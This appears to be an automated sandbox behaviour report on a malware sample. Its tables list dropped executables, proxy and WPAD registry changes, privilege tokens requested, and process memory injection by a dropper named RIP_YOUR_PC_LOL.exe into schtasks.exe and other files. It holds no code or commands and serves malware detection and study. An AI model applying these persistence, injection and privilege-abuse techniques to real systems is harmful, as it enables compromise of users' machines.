Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Help\Winlogon.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\HD____11.19.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\svchos.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\PING.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\aaa.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Opus.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\TXPlatforn.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\svchost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\22.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\___11.19.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\FFDvbcrdfqs.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\healastounding.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\gay.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\4.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\aaa.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\svchost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Dcvxaamev.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Pluto Panel.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Dcvxaamev.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\FFDvbcrdfqs.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\test.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\Ö÷¶¯·ÀÓù·þÎñÄ£¿é.exe N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{CC3CEE90-FC83-4AED-AF5B-78B42F7F7325}\aa-ca-f0-57-92-4a C:\Windows\SysWOW64\svchost.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\aa-ca-f0-57-92-4a\WpadDecisionReason = "1" C:\Windows\SysWOW64\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections C:\Windows\SysWOW64\svchost.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\SysWOW64\svchost.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" C:\Windows\SysWOW64\svchost.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f00a2000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\SysWOW64\svchost.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{CC3CEE90-FC83-4AED-AF5B-78B42F7F7325}\WpadDecision = "0" C:\Windows\SysWOW64\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\aa-ca-f0-57-92-4a C:\Windows\SysWOW64\svchost.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\SysWOW64\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{CC3CEE90-FC83-4AED-AF5B-78B42F7F7325} C:\Windows\SysWOW64\svchost.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{CC3CEE90-FC83-4AED-AF5B-78B42F7F7325}\WpadDecisionReason = "1" C:\Windows\SysWOW64\svchost.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{CC3CEE90-FC83-4AED-AF5B-78B42F7F7325}\WpadNetworkName = "Network 3" C:\Windows\SysWOW64\svchost.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\SysWOW64\svchost.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" C:\Windows\SysWOW64\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\SysWOW64\svchost.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{CC3CEE90-FC83-4AED-AF5B-78B42F7F7325}\WpadDecisionTime = d02dbac68046db01 C:\Windows\SysWOW64\svchost.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" C:\Windows\SysWOW64\svchost.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix C:\Windows\SysWOW64\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings C:\Windows\SysWOW64\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings C:\Windows\SysWOW64\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad C:\Windows\SysWOW64\svchost.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\aa-ca-f0-57-92-4a\WpadDecisionTime = d02dbac68046db01 C:\Windows\SysWOW64\svchost.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\aa-ca-f0-57-92-4a\WpadDecision = "0" C:\Windows\SysWOW64\svchost.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" C:\Windows\SysWOW64\svchost.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\___11.19.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Opus.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Opus.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Opus.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\ProgramData\Start Menu\dllhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\22.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Opus.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Pluto Panel.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\TXPlatforn.exe N/A
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\TXPlatforn.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\3.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\Opus.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
Token: SeDebugPrivilege N/A C:\ProgramData\Start Menu\dllhost.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\aaa.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\svchost.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\Cursors\WUDFhosts.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Roaming\aaa.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Roaming\aaa.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Roaming\aaa.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Roaming\aaa.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Roaming\aaa.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Roaming\aaa.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Roaming\aaa.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Roaming\aaa.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Roaming\aaa.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Roaming\aaa.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Roaming\aaa.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Roaming\aaa.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Roaming\aaa.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Roaming\aaa.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Roaming\aaa.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Roaming\aaa.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Roaming\aaa.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Roaming\aaa.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Roaming\aaa.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Roaming\aaa.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Roaming\aaa.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Roaming\aaa.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Roaming\aaa.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Roaming\aaa.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Roaming\aaa.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Roaming\aaa.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Roaming\aaa.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Roaming\aaa.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Roaming\aaa.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Roaming\aaa.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Roaming\aaa.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Roaming\aaa.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\Pluto Panel.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\TXPlatforn.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\TXPlatforn.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1364 wrote to memory of 1528 N/A C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe C:\Windows\system32\schtasks.exe
PID 1364 wrote to memory of 1528 N/A C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe C:\Windows\system32\schtasks.exe
PID 1364 wrote to memory of 1528 N/A C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe C:\Windows\system32\schtasks.exe
PID 1364 wrote to memory of 1528 N/A C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe C:\Windows\system32\schtasks.exe
PID 1364 wrote to memory of 2180 N/A C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe C:\Users\Admin\AppData\Roaming\Pluto Panel.exe
PID 1364 wrote to memory of 2180 N/A C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe C:\Users\Admin\AppData\Roaming\Pluto Panel.exe
PID 1364 wrote to memory of 2180 N/A C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe C:\Users\Admin\AppData\Roaming\Pluto Panel.exe
PID 1364 wrote to memory of 2180 N/A C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe C:\Users\Admin\AppData\Roaming\Pluto Panel.exe
PID 1364 wrote to memory of 2972 N/A C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe
PID 1364 wrote to memory of 2972 N/A C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe
PID 1364 wrote to memory of 2972 N/A C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe
PID 1364 wrote to memory of 2972 N/A C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe
PID 1528 wrote to memory of 2076 N/A C:\Users\Admin\AppData\Roaming\healastounding.exe C:\Users\Admin\AppData\Roaming\test.exe
PID 1528 wrote to memory of 2076 N/A C:\Users\Admin\AppData\Roaming\healastounding.exe C:\Users\Admin\AppData\Roaming\test.exe
PID 1528 wrote to memory of 2076 N/A C:\Users\Admin\AppData\Roaming\healastounding.exe C:\Users\Admin\AppData\Roaming\test.exe
PID 1528 wrote to memory of 2076 N/A C:\Users\Admin\AppData\Roaming\healastounding.exe C:\Users\Admin\AppData\Roaming\test.exe
PID 1364 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe C:\Users\Admin\AppData\Roaming\22.exe
PID 1364 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe C:\Users\Admin\AppData\Roaming\22.exe
PID 1364 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe C:\Users\Admin\AppData\Roaming\22.exe
PID 1364 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe C:\Users\Admin\AppData\Roaming\22.exe
PID 1364 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe C:\Users\Admin\AppData\Roaming\22.exe
PID 1364 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe C:\Users\Admin\AppData\Roaming\22.exe
PID 1364 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe C:\Users\Admin\AppData\Roaming\22.exe
PID 1528 wrote to memory of 2192 N/A C:\Users\Admin\AppData\Roaming\healastounding.exe C:\Users\Admin\AppData\Roaming\gay.exe
PID 1528 wrote to memory of 2192 N/A C:\Users\Admin\AppData\Roaming\healastounding.exe C:\Users\Admin\AppData\Roaming\gay.exe
PID 1528 wrote to memory of 2192 N/A C:\Users\Admin\AppData\Roaming\healastounding.exe C:\Users\Admin\AppData\Roaming\gay.exe
PID 1528 wrote to memory of 2192 N/A C:\Users\Admin\AppData\Roaming\healastounding.exe C:\Users\Admin\AppData\Roaming\gay.exe
PID 1364 wrote to memory of 2564 N/A C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe C:\Users\Admin\AppData\Roaming\___11.19.exe
PID 1364 wrote to memory of 2564 N/A C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe C:\Users\Admin\AppData\Roaming\___11.19.exe
PID 1364 wrote to memory of 2564 N/A C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe C:\Users\Admin\AppData\Roaming\___11.19.exe
PID 1364 wrote to memory of 2564 N/A C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe C:\Users\Admin\AppData\Roaming\___11.19.exe
PID 2972 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe
PID 2972 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe
PID 2972 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe
PID 2972 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe
PID 2972 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe
PID 2972 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe
